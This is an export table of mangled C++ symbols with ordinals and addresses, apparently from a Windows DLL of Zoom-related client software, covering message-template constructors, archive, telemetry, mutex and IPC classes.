              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IH@Archive@Cmm@@QAE@PBDH000@Z960x438290
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@II@Archive@Cmm@@QAE@PBDH000@Z970x43b120
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH000@Z980x4369f0
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@I_J@Archive@Cmm@@QAE@PBDH000@Z990x435e30
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAE@PBDH000@Z1000x43a050
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z1010x435460
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@_J@Archive@Cmm@@QAE@PBDH000@Z1020x443cf0
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_JI@Archive@Cmm@@QAE@PBDH000@Z1030x4361e0
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_J_J@Archive@Cmm@@QAE@PBDH000@Z1040x437a30
              ??0?$CmmMessageTemplate_3@_JV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH000@Z1050x43f550
              ??0?$CmmMessageTemplate_3@_JV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z1060x4410f0
              ??0?$CmmMessageTemplate_3@_JV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z1070x4396c0
              ??0?$CmmMessageTemplate_4@HHHH@Archive@Cmm@@QAE@PBDH0000@Z1080x4413c0
              ??0?$CmmMessageTemplate_4@HHHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0000@Z1090x43a680
              ??0?$CmmMessageTemplate_4@HIHI@Archive@Cmm@@QAE@PBDH0000@Z1100x4400d0
              ??0?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@II@Archive@Cmm@@QAE@PBDH0000@Z1110x43fb10
              ??0?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@H@Archive@Cmm@@QAE@PBDH0000@Z1120x43c8c0
              ??0?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z1130x4437d0
              ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAE@PBDH0000@Z1140x442d60
              ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAE@PBDH0000@Z1150x4428b0
              ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z1160x4374b0
              ??0?$CmmMessageTemplate_4@IHIH@Archive@Cmm@@QAE@PBDH0000@Z1170x4403b0
              ??0?$CmmMessageTemplate_4@IHII@Archive@Cmm@@QAE@PBDH0000@Z1180x4408c0
              ??0?$CmmMessageTemplate_4@IHV?$CStringT@_W@Cmm@@_J@Archive@Cmm@@QAE@PBDH0000@Z1190x438800
              ??0?$CmmMessageTemplate_4@IIII@Archive@Cmm@@QAE@PBDH0000@Z1200x437270
              ??0?$CmmMessageTemplate_4@IIV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH0000@Z1210x43be40
              ??0?$CmmMessageTemplate_4@IV?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH0000@Z1220x439090
              ??0?$CmmMessageTemplate_4@IV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z1230x437e30
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HHH@Archive@Cmm@@QAE@PBDH0000@Z1240x43f8d0
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HHV12@@Archive@Cmm@@QAE@PBDH0000@Z1250x43cbf0
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HV12@V12@@Archive@Cmm@@QAE@PBDH0000@Z1260x43d4a0
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IHV12@@Archive@Cmm@@QAE@PBDH0000@Z1270x43e900
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@III@Archive@Cmm@@QAE@PBDH0000@Z1280x43c180
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IV12@H@Archive@Cmm@@QAE@PBDH0000@Z1290x43c3d0
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@IV12@@Archive@Cmm@@QAE@PBDH0000@Z1300x43fd70
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH0000@Z1310x43e6b0
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@I@Archive@Cmm@@QAE@PBDH0000@Z1320x4443e0
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z1330x43b580
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@@Archive@Cmm@@QAE@PBDH0000@Z1340x443f30
              ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@_JV12@H@Archive@Cmm@@QAE@PBDH0000@Z1350x43dc10
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HHH@Archive@Cmm@@QAE@PBDH0000@Z1360x443a80
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HII@Archive@Cmm@@QAE@PBDH0000@Z1370x441df0
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HIV12@@Archive@Cmm@@QAE@PBDH0000@Z1380x441aa0
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@IHI@Archive@Cmm@@QAE@PBDH0000@Z1390x4381d0
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAE@PBDH0000@Z1400x4368d0
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@I_JI@Archive@Cmm@@QAE@PBDH0000@Z1410x435d70
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAE@PBDH0000@Z1420x439f90
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@HV12@@Archive@Cmm@@QAE@PBDH0000@Z1430x4452b0
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH0000@Z1440x4385b0
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAE@PBDH0000@Z1450x436c90
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z1460x435340
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@V?$CStringT@D@2@@Archive@Cmm@@QAE@PBDH0000@Z1470x444c60
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@_J@Archive@Cmm@@QAE@PBDH0000@Z1480x446520
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@_JII@Archive@Cmm@@QAE@PBDH0000@Z1490x436120
              ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@_J_JV12@@Archive@Cmm@@QAE@PBDH0000@Z1500x437910
              ??0?$CmmMessageTemplate_4@_JV?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH0000@Z1510x43f430
              ??0?$CmmMessageTemplate_4@_JV?$CStringT@D@Cmm@@V12@_J@Archive@Cmm@@QAE@PBDH0000@Z1520x441020
              ??0?$CmmMessageTemplate_4@_JV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z1530x4395a0
              ??0?$CmmMessageTemplate_5@HHHHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00000@Z1540x42a720
              ??0?$CmmMessageTemplate_5@HHHV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00000@Z1550x42cd40
              ??0?$CmmMessageTemplate_5@HV?$CStringT@D@Cmm@@III@Archive@Cmm@@QAE@PBDH00000@Z1560x42b3c0
              ??0?$CmmMessageTemplate_5@HV?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH00000@Z1570x42a010
              ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAE@PBDH00000@Z1580x42a420
              ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH00000@Z1590x42f4e0
              ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1600x42b9d0
              ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@_K@Archive@Cmm@@QAE@PBDH00000@Z1610x4289a0
              ??0?$CmmMessageTemplate_5@IHIHI@Archive@Cmm@@QAE@PBDH00000@Z1620x42b150
              ??0?$CmmMessageTemplate_5@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@@Archive@Cmm@@QAE@PBDH00000@Z1630x42e240
              ??0?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1640x42d670
              ??0?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAE@PBDH00000@Z1650x42c1c0
              ??0?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1660x42ef90
              ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HHV12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1670x42be70
              ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HV12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1680x42bd70
              ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HV12@V12@_J@Archive@Cmm@@QAE@PBDH00000@Z1690x42bab0
              ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IHV12@I@Archive@Cmm@@QAE@PBDH00000@Z1700x42b810
              ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IIIH@Archive@Cmm@@QAE@PBDH00000@Z1710x42c290
              ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@IV12@_J@Archive@Cmm@@QAE@PBDH00000@Z1720x42b220
              ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@HH@Archive@Cmm@@QAE@PBDH00000@Z1730x42b8e0
              ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1740x42c950
              ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@@Archive@Cmm@@QAE@PBDH00000@Z1750x429af0
              ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@_JV12@HV12@@Archive@Cmm@@QAE@PBDH00000@Z1760x42bba0
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HHHH@Archive@Cmm@@QAE@PBDH00000@Z1770x429d70
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HIIV12@@Archive@Cmm@@QAE@PBDH00000@Z1780x42ab40
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IHIH@Archive@Cmm@@QAE@PBDH00000@Z1790x42ecd0
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@I@Archive@Cmm@@QAE@PBDH00000@Z1800x42a350
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1810x42f6a0
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@HHH@Archive@Cmm@@QAE@PBDH00000@Z1820x42d0d0
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1830x428430
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@HV12@@Archive@Cmm@@QAE@PBDH00000@Z1840x42e340
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@IH@Archive@Cmm@@QAE@PBDH00000@Z1850x42f5b0
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@QAE@PBDH00000@Z1860x4285e0
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@QAE@PBDH00000@Z1870x42fcb0
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1880x42fbd0
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V?$CStringT@D@2@H@Archive@Cmm@@QAE@PBDH00000@Z1890x4297f0
              ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@_J_JV12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1900x42f330
              ??0?$CmmMessageTemplate_5@_JV?$CStringT@D@Cmm@@IV12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1910x42b730
              ??0?$CmmMessageTemplate_5@_JV?$CStringT@D@Cmm@@V12@_JV12@@Archive@Cmm@@QAE@PBDH00000@Z1920x42b070
              ??0?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAE@PBDH00000@Z1930x42d4b0
              ??0?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z1940x42d3d0
              ??0?$CmmMessageTemplate_6@HHHHV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000000@Z1950x42a620
              ??0?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAE@PBDH000000@Z1960x42cc50
              ??0?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000000@Z1970x429240
              ??0?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@IIII@Archive@Cmm@@QAE@PBDH000000@Z1980x42b2f0
              ??0?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@V12@V12@HV12@@Archive@Cmm@@QAE@PBDH000000@Z1990x429f30
              ??0?$CmmMessageTemplate_6@HV?$CStringT@_W@Cmm@@V12@V12@HH@Archive@Cmm@@QAE@PBDH000000@Z2000x42f410
              ??0?$CmmMessageTemplate_6@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@@Archive@Cmm@@QAE@PBDH000000@Z2010x42e140
              ??0?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@IV12@V12@H@Archive@Cmm@@QAE@PBDH000000@Z2020x42d580
              ??0?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@QAE@PBDH000000@Z2030x42c0f0
              ??0?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000@Z2040x42ee90
              ??0?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@_J@Archive@Cmm@@QAE@PBDH000000@Z2050x4288d0
              ??0?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@HV12@V12@V12@H@Archive@Cmm@@QAE@PBDH000000@Z2060x42bc80
              ??0?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000@Z2070x42c850
              ??0?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@@Archive@Cmm@@QAE@PBDH000000@Z2080x4299f0
              ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HHHHH@Archive@Cmm@@QAE@PBDH000000@Z2090x429ca0
              ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HIIV12@V12@@Archive@Cmm@@QAE@PBDH000000@Z2100x42aa40
              ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IHIHV12@@Archive@Cmm@@QAE@PBDH000000@Z2110x42ebf0
              ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@II@Archive@Cmm@@QAE@PBDH000000@Z2120x42a280
              ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J@Archive@Cmm@@QAE@PBDH000000@Z2130x428f70
              ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@HHHH@Archive@Cmm@@QAE@PBDH000000@Z2140x42d000
              ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@HH@Archive@Cmm@@QAE@PBDH000000@Z2150x428510
              ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@H@Archive@Cmm@@QAE@PBDH000000@Z2160x429720
              ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000@Z2170x42fad0
              ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@@Archive@Cmm@@QAE@PBDH000000@Z2180x42f230
              ??0?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@IV12@V12@H@Archive@Cmm@@QAE@PBDH000000@Z2190x42b640
              ??0?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@@Archive@Cmm@@QAE@PBDH000000@Z2200x42af70
              ??0?$CmmMessageTemplate_6@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000@Z2210x42d2d0
              ??0?$CmmMessageTemplate_7@HHHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z2220x42a510
              ??0?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@HV12@@Archive@Cmm@@QAE@PBDH0000000@Z2230x42cb60
              ??0?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z2240x429130
              ??0?$CmmMessageTemplate_7@HV?$CStringT@D@Cmm@@V12@V12@HV12@H@Archive@Cmm@@QAE@PBDH0000000@Z2250x429e40
              ??0?$CmmMessageTemplate_7@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z2260x42e030
              ??0?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@III@Archive@Cmm@@QAE@PBDH0000000@Z2270x42c020
              ??0?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@I@Archive@Cmm@@QAE@PBDH0000000@Z2280x42eda0
              ??0?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@@Archive@Cmm@@QAE@PBDH0000000@Z2290x4287e0
              ??0?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z2300x42c740
              ??0?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@V32@@Archive@Cmm@@QAE@PBDH0000000@Z2310x4298e0
              ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HHHHHH@Archive@Cmm@@QAE@PBDH0000000@Z2320x429bd0
              ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z2330x42a930
              ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IHIHV12@H@Archive@Cmm@@QAE@PBDH0000000@Z2340x42eb00
              ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@II_J@Archive@Cmm@@QAE@PBDH0000000@Z2350x42a1b0
              ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_J@Archive@Cmm@@QAE@PBDH0000000@Z2360x428ea0
              ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@HHHHV12@@Archive@Cmm@@QAE@PBDH0000000@Z2370x42cf10
              ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HH@Archive@Cmm@@QAE@PBDH0000000@Z2380x429650
              ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z2390x42f9c0
              ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@H@Archive@Cmm@@QAE@PBDH0000000@Z2400x42f140
              ??0?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@IV12@V12@HH@Archive@Cmm@@QAE@PBDH0000000@Z2410x42b570
              ??0?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z2420x42ae60
              ??0?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z2430x42d1c0
              ??0?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2440x42ca50
              ??0?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@QAE@PBDH00000000@Z2450x429040
              ??0?$CmmMessageTemplate_8@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2460x42df20
              ??0?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@IIII@Archive@Cmm@@QAE@PBDH00000000@Z2470x42bf50
              ??0?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2480x4286d0
              ??0?$CmmMessageTemplate_8@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2490x42c630
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2500x42a820
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IHIHV12@H_K@Archive@Cmm@@QAE@PBDH00000000@Z2510x42ea20
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@II_JI@Archive@Cmm@@QAE@PBDH00000000@Z2520x42a0e0
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JH@Archive@Cmm@@QAE@PBDH00000000@Z2530x428dd0
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@HHHHV12@H@Archive@Cmm@@QAE@PBDH00000000@Z2540x42ce20
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@@Archive@Cmm@@QAE@PBDH00000000@Z2550x429560
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2560x42f8b0
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@HH@Archive@Cmm@@QAE@PBDH00000000@Z2570x42f070
              ??0?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@IV12@V12@HH_J@Archive@Cmm@@QAE@PBDH00000000@Z2580x42b490
              ??0?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2590x42ad50
              ??0?$CmmMessageTemplate_9@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z2600x42de10
              ??0?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@H@Archive@Cmm@@QAE@PBDH000000000@Z2610x42c540
              ??0?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z2620x42c380
              ??0?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IHIHV12@H_KH@Archive@Cmm@@QAE@PBDH000000000@Z2630x42e950
              ??0?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHH@Archive@Cmm@@QAE@PBDH000000000@Z2640x428d00
              ??0?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z2650x429450
              ??0?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z2660x42f7a0
              ??0?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z2670x42ac40
              ??0CAtomicInt@Cmm@@QAE@J@Z2680x411460
              ??0CClock@Cmm@@QAE@XZ2690x412020
              ??0CCmmArchiveObjHelper@Cmm@@QAE@PBD@Z2700x4529a0
              ??0CCmmArchiveObjHelper@Cmm@@QAE@PBEI@Z2710x4529c0
              ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ2720x454f50
              ??0CCmmArchivePath@Cmm@@QAE@ABV?$CStringT@_W@1@@Z2730x459bf0
              ??0CCmmArchiveServiceImp@Archive@Cmm@@QAE@XZ2740x455290
              ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ2750x458660
              ??0CCmmArchiveVarivant@Cmm@@QAE@ABV01@@Z2760x4598e0
              ??0CCmmArchiveVarivant@Cmm@@QAE@XZ2770x451ed0
              ??0CCmmPerfTelemetry@@QAE@XZ2780x4651f0
              ??0CCmmPerfTelemetryEventWOStack@@QAE@ABV0@@Z2790x456250
              ??0CCmmPerfTelemetryEventWOStack@@QAE@UPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_J2800x464e80
              ??0CCmmPerfTelemetryEventWStack@@QAE@ABV0@@Z2810x4560a0
              ??0CCmmPerfTelemetryEventWStack@@QAE@UPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_J@2820x464cd0
              ??0CCmmPerfTelemetryLog@@QAE@ABV0@@Z2830x4563b0
              ??0CCmmPerfTelemetryLog@@QAE@ABV?$CStringT@D@Cmm@@0H0@Z2840x4650f0
              ??0CCmmPerfTelemetryStacks@@QAE@ABV0@@Z2850x456300
              ??0CCmmPerfTelemetryStacks@@QAE@ABV?$CStringT@D@Cmm@@0H@Z2860x464fe0
              ??0CCritical@Cmm@@QAE@XZ2870x40c750
              ??0CEvent@Cmm@@QAE@XZ2880x40c220
              ??0CFile@Cmm@@QAE@PAX@Z2890x411460
              ??0CFileName@Cmm@@QAE@$$QAV01@@Z2900x412660
              ??0CFileName@Cmm@@QAE@ABV01@@Z2910x412640
              ??0CFileName@Cmm@@QAE@XZ2920x402340
              ??0CIPCChannelThread@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@Channel@1@H@Z2930x427fd0
              ??0CIPCChannelThread@ssb_ipc@@QAE@W4ChannelMode@1@PAVListener@Channel@1@HPAX@Z2940x428040
              ??0CMutex@Cmm@@QAE@XZ2950x4170b0
